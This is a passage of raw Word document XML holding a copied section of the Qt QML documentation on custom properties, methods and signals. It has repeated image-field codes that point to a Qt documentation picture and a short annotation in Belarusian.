          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00790650">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00790650">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C34F7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C34F7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00C34F7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C472B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C472B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00C472B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002A6A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002A6A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="002A6A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B75670">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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png"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"http://doc.qt.io/qt-5/images/documents-definetypes-attributes.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1026" type="#_x0000_t75" alt="" style="width:1in;height:187.2pt">
            <v:imagedata r:id="rId175" r:href="rId176"/>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00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002A6A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C472B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C34F7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00790650">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CD015D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B307B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00944C21" w:rsidRDefault="00187F1A" w:rsidP="00187F1A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The attributes that are accessible to objects of the custom QML type </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>include any</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId177" w:anchor="defining-property-attributes" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>custom properties</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId178" w:anchor="defining-method-attributes" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>methods</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId179" w:anchor="defining-signal-attributes" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>signals</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that have additionally been defined for an object</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For example, suppose the</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId180" w:history="1">
        <w:r w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in</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SquareButton.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>had been defined as follows, with additional properties, methods and signals:</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00944C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00944C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">дадаваць уласныя ўласцівасці і метады да стандартных тыпаў – гэта адметная рыса мовы кмл. Так нельга рабіць з тымі ж аб’ектамі </w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00944C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00944C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00944C21" w:rsidRPr="00944C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> – маецца на ўвазе дадаваць новыя метады да бібліятэчн</w:t>
      </w:r>
      <w:r w:rsidR="00944C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>ых функцый //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00B307B1"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be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
